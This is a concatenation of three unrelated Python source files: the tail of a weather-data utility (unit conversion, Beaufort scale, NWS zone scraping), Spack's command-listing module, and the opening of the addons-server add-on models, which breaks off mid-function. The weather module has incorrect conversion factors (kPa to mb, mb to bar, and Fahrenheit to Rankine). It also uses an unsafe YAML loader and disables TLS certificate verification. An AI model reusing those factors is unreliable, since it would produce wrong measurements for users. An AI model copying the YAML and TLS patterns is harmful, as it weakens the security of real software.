except KeyError as exc:
logging.error('Exception: %s', exc)
return False
def load_yaml(directory, filename):
"""
Load a YAML file in and return the dictionary that is created.
"""
logging.debug('Entering load_yaml() function.')
try:
with open(os.path.join(directory, filename), 'r') as iyaml:
logging.info('Loading YAML file: %s', os.path.join(directory, filename))
return yaml.load(iyaml.read(), Loader=yaml.Loader)
except Exception as exc:
print('EXCEPTION -- unable to open yaml settings file: {0}'.format(exc))
logging.error('Unable to open yaml settings file: %s', exc)
return None
def convert_units(value, from_unit, to_unit, missing=-9999.9):
"""
As elsewhere, this function depends on use of specific unit conventions,
as labeled in the settings.yml document (and comments).
"""
convertme = {'m_s-1':
{'kph': lambda x: float(x) * 3.6,
'mph': lambda x: float(x) * 2.23694,
'kt': lambda x: float(x) * 1.94384
},
'kph':
{'m_s-1': lambda x: float(x) * 0.2778,
'mph': lambda x: float(x) * 0.62137,
'kt': lambda x: float(x) * 0.54
},
'km_h-1':
{'m_s-1': lambda x: float(x) * 0.2778,
'mph': lambda x: float(x) * 0.62137,
'kt': lambda x: float(x) * 0.54
},
'mph':
{'m_s-1': lambda x: float(x) * 0.4470389,
'kph': lambda x: float(x) * 1.60934,
'kt': lambda x: float(x) * 0.869
},
'kt':
{'m_s-1': lambda x: float(x) * 0.514443,
'mph': lambda x: float(x) * 1.1508,
'kph': lambda x: float(x) * 1.852
},
'mb':
{'Pa': lambda x: float(x) * 100.0,
'kPa': lambda x: float(x) * 0.10,
'bar': lambda x: float(x) * 1000.0,
'inHg': lambda x: float(x) * 0.02953
},
'Pa':
{'mb': lambda x: float(x) * 1E-2,
'kPa': lambda x: float(x) * 1E-3,
'bar': lambda x: float(x) * 1E-5,
'inHg': lambda x: float(x) * 0.0002953
},
'kPa':
{'mb': lambda x: float(x) * 1E5,
'Pa': lambda x: float(x) * 1E3,
'bar': lambda x: float(x) * 0.01,
'inHg': lambda x: float(x) * 0.2953
},
'inHg':
{'mb': lambda x: float(x) * 33.86390607,
'Pa': lambda x: float(x) * 3386.390607,
'bar': lambda x: float(x) * 0.03386390607,
'kPa': lambda x: float(x) * 3.386390607
},
'C':
{'F': lambda x: (float(x) * 9.0/5.0) + 32.0,
'R': lambda x: (float(x) * 9.0/5.0) + 491.67,
'K': lambda x: float(x) + 273.15
},
'F':
{'C': lambda x: (float(x) - 32.0) * 5.0 / 9.0,
'R': lambda x: float(x) + 491.67,
'K': lambda x: ((float(x) - 32.0) * 5.0 / 9.0) + 273.15
},
'percent':
{'percent': lambda x: x
}
}
percents = ['percent', 'pct', '%', 'Percent']
if value == '' or value == 'None' or value is None:
return missing
if from_unit in percents or to_unit in percents:
return value
if value == missing:
return missing
try:
return convertme[from_unit][to_unit](value)
except ValueError:
return None
return None
def beaufort_scale(data, speed, units='mph'):
"""
Determine the Beaufort scale ranking of a given wind speed.
Gusts are NOT used to determine scale rank.
"""
blist = data['defaults']['beaufort_scale']
if speed is None or speed == 'None':
logging.error('Input speed %s cannot be converted to Beaufort. Returning None.', speed)
return None
logging.debug('input speed value: %s %s', speed, units)
if units != 'mph':
speed = convert_units(speed, from_unit=units, to_unit='mph')
logging.debug('output speed value: %s mph', speed)
speed = int(speed)
logging.debug('integer speed value: %s mph', speed)
for i in blist.keys():
logging.debug('Key: %s\tmin speed: %s\tmax speed: %s', i, blist[i][0], blist[i][1])
if int(blist[i][0]) <= speed and speed <= int(blist[i][1]):
logging.debug('Speed (%s mph) between %s & %s. Returning %s', speed,
blist[i][0],
blist[i][1],
i)
return int(i)
return None
def make_request(url, retries=1, payload=False, use_json=True):
"""
Uniform function for requests.get().
"""
while retries:
if payload:
try:
response = requests.get(url, params=payload, verify=False, timeout=10)
except requests.exceptions.ReadTimeout as exc:
logging.warn('Request timed out: %s', exc)
sleep(2)
continue
else:
try:
response = requests.get(url, verify=False, timeout=10)
except requests.exceptions.ReadTimeout as exc:
logging.warn('Request timed out: %s', exc)
sleep(2)
retries = retries - 1
continue
if response:
resp = judge_payload(response, use_json)
if resp:
return resp
retries = retries - 1
logging.error('Unsuccessful response (%s). Returning -None-', response.status_code)
return None
def judge_payload(response, use_json):
"""
Pull out the request payload, provided it's either text or json.
"""
try:
if response.status_code:
pass
except Exception as exc:
logging.error('No response to HTTP query. Returning -None-.')
return None
if response.status_code == 200:
if use_json is True:
try:
return response.json()
except Exception as exc:
logging.warn('Unable to decode JSON: %s', exc)
else:
try:
return response.text
except Exception as exc:
logging.error('Unable to decode response text: %s', exc)
return None
logging.error('Response from server was not OK: %s', response.status_code)
return None
def populate_alert_counties(somedict, alerts_url):
"""
Takes in a dict, formatted with state name(s) as the key, with a list
of county names as the value.
Returns a populated dictionary with records in the format:
'countyname': [1, 'CountyAbbr', 'ZoneAbbr', 'StateAbbr']
"""
returndict = {}
for key, values in somedict.iteritems():
statezonelist = get_zonelist(key, 'zone', alerts_url)
if not statezonelist:
return None
statecountylist = get_zonelist(key, 'county', alerts_url)
if not statecountylist:
return None
for county in values:
logging.info('Opening zone and county tables for county: %s', county)
cabbr = parse_zone_table(county, statecountylist)
zabbr = parse_zone_table(county, statezonelist)
returndict[county] = [1, cabbr, zabbr, key]
return returndict
def get_zonelist(stateabbr, zoneorcounty, alerts_url):
"""
go to alerts.weather.gov/cap/ and retrieve the forecast zone / county for
the given name of the county. There are other zone names than only county
names, like "Central Brewster County", "Chisos Basin", "Coastal Galveston",
or even "Guadalupe Mountains Above 7000 Feet", so the user can also list
these as "counties".
"""
x_value = 0
if zoneorcounty == 'zone':
x_value = 2
if zoneorcounty == 'county':
x_value = 3
if x_value == 0:
logging.error('unable to determine "zone" or "county". Returning None.')
return None
localfile = 'local_{1}_table_{0}.html'.format(stateabbr, zoneorcounty)
logging.info('Checking for existence of %s locally.', localfile)
if os.path.exists(localfile) is not True:
locally_cache_zone_table(alerts_url, stateabbr, zoneorcounty)
if os.path.exists(localfile) is True:
return retrieve_local_zone_table(stateabbr, zoneorcounty)
logging.error('Unable to retrieve zone table. Returning None.')
return None
def retrieve_local_zone_table(stateabbr, zoneorcounty):
"""
Check for, and retrieve, a locally cached copy of the zone/county table.
"""
table = False
filename = 'local_{1}_table_{0}.html'.format(stateabbr, zoneorcounty)
with open(filename, 'r') as localcopy:
table = BeautifulSoup(localcopy.read(), 'lxml')
parsed_table1 = table.find_all('table')[3]
rows = parsed_table1.find_all('tr')
return rows
def locally_cache_zone_table(alerts_url, stateabbr, zoneorcounty):
"""
The zones and counties change so infrequently that it makes no sense to
retrieve the data live, and locally caching the data will improve performance.
"""
write_status = False
page = '{0}.php'.format(stateabbr)
rooturl = os.path.join(alerts_url, page)
x_value = 0
if zoneorcounty == 'zone':
x_value = 2
if zoneorcounty == 'county':
x_value = 3
if x_value == 0:
return None
payload = {'x': x_value}
logging.debug('Retrieving: %s -- with payload %s', rooturl, payload)
returned_table = make_request(url=rooturl, payload=payload, use_json=False)
filename = 'local_{1}_table_{0}.html'.format(stateabbr, zoneorcounty)
with open(filename, 'w') as localcopy:
localcopy.write(returned_table)
write_status = True
return write_status
def parse_zone_table(county, rows):
"""
find the zone or county abbreviation within a returned table that includes
a county name or area name to match.
"""
for i in rows:
cells = i.find_all('td')
if len(cells) > 1:
if cells[2].text.lower() == county.lower():
# print('{0}: {1}'.format(cells[2].text.strip(), cells[1].text.strip()))
return cells[1].text.strip()
return None
def make_timestamp():
"""
Returns tuple of two strings: "YYYYMMDD" and "HHMMSS"
"""
dutc = datetime.utcnow()
hhmmss = dutc.strftime('%H%M%S')
ymd = dutc.strftime('%Y%m%d')
return (ymd, hhmmss)
| 32.266559 | 94 | 0.608972 |
ace758d339dffff51856b202751b4b92838b7da4 | 9,480 | py | Python | lib/spack/spack/cmd/commands.py | jonglezb/spack | ebc871abbf8f082000617e1798c75260652f0770 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2 | 2020-09-10T22:50:08.000Z | 2021-01-12T22:18:54.000Z | lib/spack/spack/cmd/commands.py | jonglezb/spack | ebc871abbf8f082000617e1798c75260652f0770 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 14 | 2021-07-20T01:04:53.000Z | 2022-03-02T01:08:36.000Z | lib/spack/spack/cmd/commands.py | jonglezb/spack | ebc871abbf8f082000617e1798c75260652f0770 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 1 | 2021-05-06T00:17:46.000Z | 2021-05-06T00:17:46.000Z | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from __future__ import print_function
import argparse
import copy
import os
import re
import sys
import llnl.util.filesystem as fs
import llnl.util.tty as tty
from llnl.util.argparsewriter import (
ArgparseWriter, ArgparseRstWriter, ArgparseCompletionWriter
)
from llnl.util.tty.colify import colify
import spack.cmd
import spack.main
import spack.paths
from spack.main import section_descriptions
description = "list available spack commands"
section = "developer"
level = "long"
#: list of command formatters
formatters = {}
#: standard arguments for updating completion scripts
#: we iterate through these when called with --update-completion
update_completion_args = {
"bash": {
"aliases": True,
"format": "bash",
"header": os.path.join(
spack.paths.share_path, "bash", "spack-completion.in"),
"update": os.path.join(
spack.paths.share_path, "spack-completion.bash"),
},
}
def formatter(func):
"""Decorator used to register formatters"""
formatters[func.__name__] = func
return func
def setup_parser(subparser):
subparser.add_argument(
"--update-completion", action='store_true', default=False,
help="regenerate spack's tab completion scripts")
subparser.add_argument(
'-a', '--aliases', action='store_true', default=False,
help='include command aliases')
subparser.add_argument(
'--format', default='names', choices=formatters,
help='format to be used to print the output (default: names)')
subparser.add_argument(
'--header', metavar='FILE', default=None, action='store',
help='prepend contents of FILE to the output (useful for rst format)')
subparser.add_argument(
'--update', metavar='FILE', default=None, action='store',
help='write output to the specified file, if any command is newer')
subparser.add_argument(
'rst_files', nargs=argparse.REMAINDER,
help='list of rst files to search for `_cmd-spack-<cmd>` cross-refs')
class SpackArgparseRstWriter(ArgparseRstWriter):
"""RST writer tailored for spack documentation."""
def __init__(self, prog, out=None, aliases=False,
documented_commands=[],
rst_levels=['-', '-', '^', '~', ':', '`']):
out = sys.stdout if out is None else out
super(SpackArgparseRstWriter, self).__init__(
prog, out, aliases, rst_levels)
self.documented = documented_commands
def usage(self, *args):
string = super(SpackArgparseRstWriter, self).usage(*args)
cmd = self.parser.prog.replace(' ', '-')
if cmd in self.documented:
string += '\n:ref:`More documentation <cmd-{0}>`\n'.format(cmd)
return string
class SubcommandWriter(ArgparseWriter):
def format(self, cmd):
return ' ' * self.level + cmd.prog + '\n'
_positional_to_subroutine = {
'package': '_all_packages',
'spec': '_all_packages',
'filter': '_all_packages',
'installed': '_installed_packages',
'compiler': '_installed_compilers',
'section': '_config_sections',
'env': '_environments',
'extendable': '_extensions',
'keys': '_keys',
'help_command': '_subcommands',
'mirror': '_mirrors',
'virtual': '_providers',
'namespace': '_repos',
'hash': '_all_resource_hashes',
'pytest': '_tests',
}
class BashCompletionWriter(ArgparseCompletionWriter):
"""Write argparse output as bash programmable tab completion."""
def body(self, positionals, optionals, subcommands):
if positionals:
return """
if $list_options
then
{0}
else
{1}
fi
""".format(self.optionals(optionals), self.positionals(positionals))
elif subcommands:
return """
if $list_options
then
{0}
else
{1}
fi
""".format(self.optionals(optionals), self.subcommands(subcommands))
else:
return """
{0}
""".format(self.optionals(optionals))
def positionals(self, positionals):
# If match found, return function name
for positional in positionals:
for key, value in _positional_to_subroutine.items():
if positional.startswith(key):
return value
# If no matches found, return empty list
return 'SPACK_COMPREPLY=""'
def optionals(self, optionals):
return 'SPACK_COMPREPLY="{0}"'.format(' '.join(optionals))
def subcommands(self, subcommands):
return 'SPACK_COMPREPLY="{0}"'.format(' '.join(subcommands))
@formatter
def subcommands(args, out):
parser = spack.main.make_argument_parser()
spack.main.add_all_commands(parser)
writer = SubcommandWriter(parser.prog, out, args.aliases)
writer.write(parser)
def rst_index(out):
out.write('\n')
index = spack.main.index_commands()
sections = index['long']
dmax = max(len(section_descriptions.get(s, s)) for s in sections) + 2
cmax = max(len(c) for _, c in sections.items()) + 60
row = "%s %s\n" % ('=' * dmax, '=' * cmax)
line = '%%-%ds %%s\n' % dmax
out.write(row)
out.write(line % (" Category ", " Commands "))
out.write(row)
for section, commands in sorted(sections.items()):
description = section_descriptions.get(section, section)
for i, cmd in enumerate(sorted(commands)):
description = description.capitalize() if i == 0 else ''
ref = ':ref:`%s <spack-%s>`' % (cmd, cmd)
comma = ',' if i != len(commands) - 1 else ''
bar = '| ' if i % 8 == 0 else ' '
out.write(line % (description, bar + ref + comma))
out.write(row)
@formatter
def rst(args, out):
# create a parser with all commands
parser = spack.main.make_argument_parser()
spack.main.add_all_commands(parser)
# extract cross-refs of the form `_cmd-spack-<cmd>:` from rst files
documented_commands = set()
for filename in args.rst_files:
with open(filename) as f:
for line in f:
match = re.match(r'\.\. _cmd-(spack-.*):', line)
if match:
documented_commands.add(match.group(1).strip())
# print an index to each command
rst_index(out)
out.write('\n')
# print sections for each command and subcommand
writer = SpackArgparseRstWriter(
parser.prog, out, args.aliases, documented_commands)
writer.write(parser)
@formatter
def names(args, out):
commands = copy.copy(spack.cmd.all_commands())
if args.aliases:
commands.extend(spack.main.aliases.keys())
colify(commands, output=out)
@formatter
def bash(args, out):
parser = spack.main.make_argument_parser()
spack.main.add_all_commands(parser)
writer = BashCompletionWriter(parser.prog, out, args.aliases)
writer.write(parser)
def prepend_header(args, out):
if not args.header:
return
with open(args.header) as header:
out.write(header.read())
def _commands(parser, args):
"""This is the 'regular' command, which can be called multiple times.
See ``commands()`` below for ``--update-completion`` handling.
"""
formatter = formatters[args.format]
# check header first so we don't open out files unnecessarily
if args.header and not os.path.exists(args.header):
tty.die("No such file: '%s'" % args.header)
# if we're updating an existing file, only write output if a command
# or the header is newer than the file.
if args.update:
if os.path.exists(args.update):
files = [
spack.cmd.get_module(command).__file__.rstrip('c') # pyc -> py
for command in spack.cmd.all_commands()]
if args.header:
files.append(args.header)
last_update = os.path.getmtime(args.update)
if not any(os.path.getmtime(f) > last_update for f in files):
tty.msg('File is up to date: %s' % args.update)
return
tty.msg('Updating file: %s' % args.update)
with open(args.update, 'w') as f:
prepend_header(args, f)
formatter(args, f)
if args.update_completion:
fs.set_executable(args.update)
else:
prepend_header(args, sys.stdout)
formatter(args, sys.stdout)
def update_completion(parser, args):
"""Iterate through the shells and update the standard completion files.
This is a convenience method to avoid calling this command many
times, and to simplify completion update for developers.
"""
for shell, shell_args in update_completion_args.items():
for attr, value in shell_args.items():
setattr(args, attr, value)
_commands(parser, args)
def commands(parser, args):
if args.update_completion:
if args.format != 'names' or any([
args.aliases, args.update, args.header
]):
tty.die("--update-completion can only be specified alone.")
# this runs the command multiple times with different arguments
return update_completion(parser, args)
else:
# run commands normally
return _commands(parser, args)
| 29.811321 | 79 | 0.63365 |
ace759fbc70b6d36fc0f0e1536456c06c1cf0cf0 | 81,352 | py | Python | src/olympia/addons/models.py | makyen/Mozilla-addons-server | 555d9f31cc4b00799466f16c8809edd5f1858ab8 | [
"BSD-3-Clause"
] | 1 | 2020-12-03T10:02:15.000Z | 2020-12-03T10:02:15.000Z | src/olympia/addons/models.py | makyen/Mozilla-addons-server | 555d9f31cc4b00799466f16c8809edd5f1858ab8 | [
"BSD-3-Clause"
] | null | null | null | src/olympia/addons/models.py | makyen/Mozilla-addons-server | 555d9f31cc4b00799466f16c8809edd5f1858ab8 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import collections
import itertools
import json
import os
import posixpath
import re
import time
from operator import attrgetter
from datetime import datetime
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.core.files.storage import default_storage as storage
from django.db import models, transaction
from django.db.models import F, Max, Q, signals as dbsignals
from django.dispatch import receiver
from django.utils.functional import cached_property
from django.utils.translation import trans_real, ugettext_lazy as _
import caching.base as caching
from django_extensions.db.fields.json import JSONField
from django_statsd.clients import statsd
from jinja2.filters import do_dictsort
import olympia.core.logger
from olympia import activity, amo, core
from olympia.amo.models import (
SlugField, OnChangeMixin, ModelBase, ManagerBase, manual_order)
from olympia.access import acl
from olympia.addons.utils import (
get_creatured_ids, get_featured_ids, generate_addon_guid)
from olympia.amo import helpers
from olympia.amo.decorators import use_master, write
from olympia.amo.utils import (
attach_trans_dict, cache_ns_key, chunked,
no_translation, send_mail, slugify, sorted_groupby, timer, to_language,
urlparams, find_language, AMOJSONEncoder)
from olympia.amo.urlresolvers import get_outgoing_url, reverse
from olympia.constants.categories import CATEGORIES, CATEGORIES_BY_ID
from olympia.files.models import File
from olympia.files.utils import (
extract_translations, resolve_i18n_message, parse_addon)
from olympia.reviews.models import Review
from olympia.tags.models import Tag
from olympia.translations.fields import (
LinkifiedField, PurifiedField, save_signal, TranslatedField, Translation)
from olympia.users.models import UserForeignKey, UserProfile
from olympia.versions.compare import version_int
from olympia.versions.models import inherit_nomination, Version
from . import signals
log = olympia.core.logger.getLogger('z.addons')
def clean_slug(instance, slug_field='slug'):
"""Cleans a model instance slug.
This strives to be as generic as possible as it's used by Addons
and Collections, and maybe more in the future.
"""
slug = getattr(instance, slug_field, None) or instance.name
if not slug:
# Initialize the slug with what we have available: a name translation,
# or the id of the instance, or in last resort the model name.
translations = Translation.objects.filter(id=instance.name_id)
if translations.exists():
slug = translations[0]
elif instance.id:
slug = str(instance.id)
else:
slug = instance.__class__.__name__
max_length = instance._meta.get_field_by_name(slug_field)[0].max_length
slug = slugify(slug)[:max_length]
if DeniedSlug.blocked(slug):
slug = slug[:max_length - 1] + '~'
# The following trick makes sure we are using a manager that returns
# all the objects, as otherwise we could have a slug clash on our hands.
# Eg with the "Addon.objects" manager, which doesn't list deleted addons,
# we could have a "clean" slug which is in fact already assigned to an
# already existing (deleted) addon. Also, make sure we use the base class.
manager = models.Manager()
manager.model = instance._meta.proxy_for_model or instance.__class__
qs = manager.values_list(slug_field, flat=True) # Get list of all slugs.
if instance.id:
qs = qs.exclude(pk=instance.id) # Can't clash with itself.
# We first need to make sure there's a clash, before trying to find a
# suffix that is available. Eg, if there's a "foo-bar" slug, "foo" is still
# available.
clash = qs.filter(**{slug_field: slug})
if clash.exists():
# Leave space for 99 clashes.
slug = slugify(slug)[:max_length - 2]
# There is a clash, so find a suffix that will make this slug unique.
lookup = {'%s__startswith' % slug_field: slug}
clashes = qs.filter(**lookup)
# Try numbers between 1 and the number of clashes + 1 (+ 1 because we
# start the range at 1, not 0):
# if we have two clashes "foo1" and "foo2", we need to try "foox"
# for x between 1 and 3 to be absolutely sure to find an available one.
for idx in range(1, len(clashes) + 2):
new = ('%s%s' % (slug, idx))[:max_length]
if new not in clashes:
slug = new
break
else:
# This could happen. The current implementation (using
# ``[:max_length -3]``) only works for the first 100 clashes in the
# worst case (if the slug is equal to or longuer than
# ``max_length - 3`` chars).
# After that, {verylongslug}-100 will be trimmed down to
# {verylongslug}-10, which is already assigned, but it's the last
# solution tested.
raise RuntimeError
setattr(instance, slug_field, slug)
return instance
class AddonQuerySet(caching.CachingQuerySet):
def id_or_slug(self, val):
"""Get add-ons by id or slug."""
if isinstance(val, basestring) and not val.isdigit():
return self.filter(slug=val)
return self.filter(id=val)
def enabled(self):
"""Get add-ons that haven't been disabled by their developer(s)."""
return self.filter(disabled_by_user=False)
def public(self):
"""Get public add-ons only"""
return self.filter(self.valid_q([amo.STATUS_PUBLIC]))
def valid(self):
"""Get valid, enabled add-ons only"""
return self.filter(self.valid_q(amo.VALID_ADDON_STATUSES))
def valid_and_disabled_and_pending(self):
"""
Get valid, pending, enabled and disabled add-ons.
Used to allow pending theme pages to still be viewed.
"""
statuses = (list(amo.VALID_ADDON_STATUSES) +
[amo.STATUS_DISABLED, amo.STATUS_PENDING])
return (self.filter(Q(status__in=statuses) | Q(disabled_by_user=True))
.exclude(type=amo.ADDON_EXTENSION,
_current_version__isnull=True))
def featured(self, app, lang=None, type=None):
"""
Filter for all featured add-ons for an application in all locales.
"""
ids = get_featured_ids(app, lang, type)
return manual_order(self.listed(app), ids, 'addons.id')
def listed(self, app, *status):
"""
Return add-ons that support a given ``app``, have a version with a file
matching ``status`` and are not disabled.
"""
if len(status) == 0:
status = [amo.STATUS_PUBLIC]
return self.filter(self.valid_q(status), appsupport__app=app.id)
def valid_q(self, status=None, prefix=''):
"""
Return a Q object that selects a valid Addon with the given statuses.
An add-on is valid if not disabled and has a current version.
``prefix`` can be used if you're not working with Addon directly and
need to hop across a join, e.g. ``prefix='addon__'`` in
CollectionAddon.
"""
if not status:
status = [amo.STATUS_PUBLIC]
def q(*args, **kw):
if prefix:
kw = dict((prefix + k, v) for k, v in kw.items())
return Q(*args, **kw)
return q(q(_current_version__isnull=False),
disabled_by_user=False, status__in=status)
class AddonManager(ManagerBase):
def __init__(self, include_deleted=False):
# DO NOT change the default value of include_deleted unless you've read
# through the comment just above the Addon managers
# declaration/instantiation and understand the consequences.
ManagerBase.__init__(self)
self.include_deleted = include_deleted
def get_queryset(self):
qs = super(AddonManager, self).get_queryset()
qs = qs._clone(klass=AddonQuerySet)
if not self.include_deleted:
qs = qs.exclude(status=amo.STATUS_DELETED)
return qs.transform(Addon.transformer)
def id_or_slug(self, val):
"""Get add-ons by id or slug."""
return self.get_queryset().id_or_slug(val)
def enabled(self):
"""Get add-ons that haven't been disabled by their developer(s)."""
return self.get_queryset().enabled()
def public(self):
"""Get public add-ons only"""
return self.get_queryset().public()
def valid(self):
"""Get valid, enabled add-ons only"""
return self.get_queryset().valid()
def valid_and_disabled_and_pending(self):
"""
Get valid, pending, enabled and disabled add-ons.
Used to allow pending theme pages to still be viewed.
"""
return self.get_queryset().valid_and_disabled_and_pending()
def featured(self, app, lang=None, type=None):
"""
Filter for all featured add-ons for an application in all locales.
"""
return self.get_queryset().featured(app, lang=lang, type=type)
def listed(self, app, *status):
"""
Return add-ons that support a given ``app``, have a version with a file
matching ``status`` and are not disabled.
"""
return self.get_queryset().listed(app, *status)
class Addon(OnChangeMixin, ModelBase):
STATUS_CHOICES = amo.STATUS_CHOICES_ADDON
guid = models.CharField(max_length=255, unique=True, null=True)
slug = models.CharField(max_length=30, unique=True, null=True)
name = TranslatedField(default=None)
default_locale = models.CharField(max_length=10,
default=settings.LANGUAGE_CODE,
db_column='defaultlocale')
type = models.PositiveIntegerField(
choices=amo.ADDON_TYPE.items(), db_column='addontype_id', default=0)
status = models.PositiveIntegerField(
choices=STATUS_CHOICES.items(), db_index=True, default=0)
icon_type = models.CharField(max_length=25, blank=True,
db_column='icontype')
homepage = TranslatedField()
support_email = TranslatedField(db_column='supportemail')
support_url = TranslatedField(db_column='supporturl')
description = PurifiedField(short=False)
summary = LinkifiedField()
developer_comments = PurifiedField(db_column='developercomments')
eula = PurifiedField()
privacy_policy = PurifiedField(db_column='privacypolicy')
the_reason = PurifiedField()
the_future = PurifiedField()
average_rating = models.FloatField(max_length=255, default=0, null=True,
db_column='averagerating')
bayesian_rating = models.FloatField(default=0, db_index=True,
db_column='bayesianrating')
total_reviews = models.PositiveIntegerField(default=0,
db_column='totalreviews')
weekly_downloads = models.PositiveIntegerField(
default=0, db_column='weeklydownloads', db_index=True)
total_downloads = models.PositiveIntegerField(
default=0, db_column='totaldownloads')
hotness = models.FloatField(default=0, db_index=True)
average_daily_downloads = models.PositiveIntegerField(default=0)
average_daily_users = models.PositiveIntegerField(default=0)
last_updated = models.DateTimeField(
db_index=True, null=True,
help_text='Last time this add-on had a file/version update')
disabled_by_user = models.BooleanField(default=False, db_index=True,
db_column='inactive')
view_source = models.BooleanField(default=True, db_column='viewsource')
public_stats = models.BooleanField(default=False, db_column='publicstats')
admin_review = models.BooleanField(default=False, db_column='adminreview')
external_software = models.BooleanField(default=False,
db_column='externalsoftware')
dev_agreement = models.BooleanField(
default=False, help_text="Has the dev agreement been signed?")
auto_repackage = models.BooleanField(
default=True, help_text='Automatically upgrade jetpack add-on to a '
'new sdk version?')
target_locale = models.CharField(
max_length=255, db_index=True, blank=True, null=True,
help_text="For dictionaries and language packs")
locale_disambiguation = models.CharField(
max_length=255, blank=True, null=True,
help_text="For dictionaries and language packs")
wants_contributions = models.BooleanField(default=False)
paypal_id = models.CharField(max_length=255, blank=True)
charity = models.ForeignKey('Charity', null=True)
suggested_amount = models.DecimalField(
max_digits=9, decimal_places=2, blank=True,
null=True, help_text=_('Users have the option of contributing more '
'or less than this amount.'))
total_contributions = models.DecimalField(max_digits=9, decimal_places=2,
blank=True, null=True)
annoying = models.PositiveIntegerField(
choices=amo.CONTRIB_CHOICES, default=0,
help_text=_(u'Users will always be asked in the Add-ons'
u' Manager (Firefox 4 and above).'
u' Only applies to desktop.'))
enable_thankyou = models.BooleanField(
default=False, help_text='Should the thank you note be sent to '
'contributors?')
thankyou_note = TranslatedField()
authors = models.ManyToManyField('users.UserProfile', through='AddonUser',
related_name='addons')
categories = models.ManyToManyField('Category', through='AddonCategory')
dependencies = models.ManyToManyField('self', symmetrical=False,
through='AddonDependency',
related_name='addons')
_current_version = models.ForeignKey(Version, db_column='current_version',
related_name='+', null=True,
on_delete=models.SET_NULL)
whiteboard = models.TextField(blank=True)
is_experimental = models.BooleanField(default=False,
db_column='experimental')
reputation = models.SmallIntegerField(default=0, null=True)
# The order of those managers is very important:
# The first one discovered, if it has "use_for_related_fields = True"
# (which it has if it's inheriting from caching.base.CachingManager), will
# be used for relations like `version.addon`. We thus want one that is NOT
# filtered in any case, we don't want a 500 if the addon is not found
# (because it has the status amo.STATUS_DELETED for example).
# The CLASS of the first one discovered will also be used for "many to many
# relations" like `collection.addons`. In that case, we do want the
# filtered version by default, to make sure we're not displaying stuff by
# mistake. You thus want the CLASS of the first one to be filtered by
# default.
# We don't control the instantiation, but AddonManager sets include_deleted
# to False by default, so filtering is enabled by default. This is also why
# it's not repeated for 'objects' below.
unfiltered = AddonManager(include_deleted=True)
objects = AddonManager()
class Meta:
db_table = 'addons'
@staticmethod
def __new__(cls, *args, **kw):
try:
type_idx = Addon._meta._type_idx
except AttributeError:
type_idx = (idx for idx, f in enumerate(Addon._meta.fields)
if f.attname == 'type').next()
Addon._meta._type_idx = type_idx
return object.__new__(cls)
def __unicode__(self):
return u'%s: %s' % (self.id, self.name)
def __init__(self, *args, **kw):
super(Addon, self).__init__(*args, **kw)
if self.type == amo.ADDON_PERSONA:
self.STATUS_CHOICES = Persona.STATUS_CHOICES
def save(self, **kw):
self.clean_slug()
super(Addon, self).save(**kw)
@classmethod
def search_public(cls):
"""Legacy search method for public add-ons.
Note that typically, code using this method do a search in ES but then
will fetch the relevant objects from the database using Addon.objects,
so deleted addons won't be returned no matter what ES returns. See
amo.search.ES and amo.search.ObjectSearchResults for more details.
In new code, use elasticsearch-dsl instead.
"""
return cls.search().filter(
is_disabled=False,
status__in=amo.REVIEWED_STATUSES,
current_version__exists=True)
@use_master
def clean_slug(self, slug_field='slug'):
if self.status == amo.STATUS_DELETED:
return
clean_slug(self, slug_field)
def is_soft_deleteable(self):
return self.status or Version.unfiltered.filter(addon=self).exists()
@transaction.atomic
def delete(self, msg='', reason=''):
# To avoid a circular import
from . import tasks
# Check for soft deletion path. Happens only if the addon status isn't
# 0 (STATUS_INCOMPLETE) with no versions.
soft_deletion = self.is_soft_deleteable()
if soft_deletion and self.status == amo.STATUS_DELETED:
# We're already done.
return
id = self.id
# Fetch previews before deleting the addon instance, so that we can
# pass the list of files to delete to the delete_preview_files task
# after the addon is deleted.
previews = list(Preview.objects.filter(addon__id=id)
.values_list('id', flat=True))
if soft_deletion:
# /!\ If we ever stop using soft deletion, and remove this code, we
# need to make sure that the logs created below aren't cascade
# deleted!
log.debug('Deleting add-on: %s' % self.id)
to = [settings.FLIGTAR]
user = core.get_user()
# Don't localize email to admins, use 'en-US' always.
with no_translation():
# The types are lazy translated in apps/constants/base.py.
atype = amo.ADDON_TYPE.get(self.type).upper()
context = {
'atype': atype,
'authors': [u.email for u in self.authors.all()],
'adu': self.average_daily_users,
'guid': self.guid,
'id': self.id,
'msg': msg,
'reason': reason,
'name': self.name,
'slug': self.slug,
'total_downloads': self.total_downloads,
'url': helpers.absolutify(self.get_url_path()),
'user_str': ("%s, %s (%s)" % (user.display_name or
user.username, user.email,
user.id) if user else "Unknown"),
}
email_msg = u"""
The following %(atype)s was deleted.
%(atype)s: %(name)s
URL: %(url)s
DELETED BY: %(user_str)s
ID: %(id)s
GUID: %(guid)s
AUTHORS: %(authors)s
TOTAL DOWNLOADS: %(total_downloads)s
AVERAGE DAILY USERS: %(adu)s
NOTES: %(msg)s
REASON GIVEN BY USER FOR DELETION: %(reason)s
""" % context
log.debug('Sending delete email for %(atype)s %(id)s' % context)
subject = 'Deleting %(atype)s %(slug)s (%(id)d)' % context
# Update or NULL out various fields.
models.signals.pre_delete.send(sender=Addon, instance=self)
self._reviews.all().delete()
# The last parameter is needed to automagically create an AddonLog.
activity.log_create(amo.LOG.DELETE_ADDON, self.pk,
unicode(self.guid), self)
self.update(status=amo.STATUS_DELETED, slug=None,
_current_version=None, modified=datetime.now())
models.signals.post_delete.send(sender=Addon, instance=self)
send_mail(subject, email_msg, recipient_list=to)
else:
# Real deletion path.
super(Addon, self).delete()
for preview in previews:
tasks.delete_preview_files.delay(preview)
return True
@classmethod
def initialize_addon_from_upload(cls, data, upload, channel):
fields = cls._meta.get_all_field_names()
guid = data.get('guid')
old_guid_addon = None
if guid: # It's an extension.
# Reclaim GUID from deleted add-on.
try:
old_guid_addon = Addon.unfiltered.get(guid=guid)
old_guid_addon.update(guid=None)
except ObjectDoesNotExist:
pass
generate_guid = (
not data.get('guid', None) and
data.get('is_webextension', False)
)
if generate_guid:
data['guid'] = guid = generate_addon_guid()
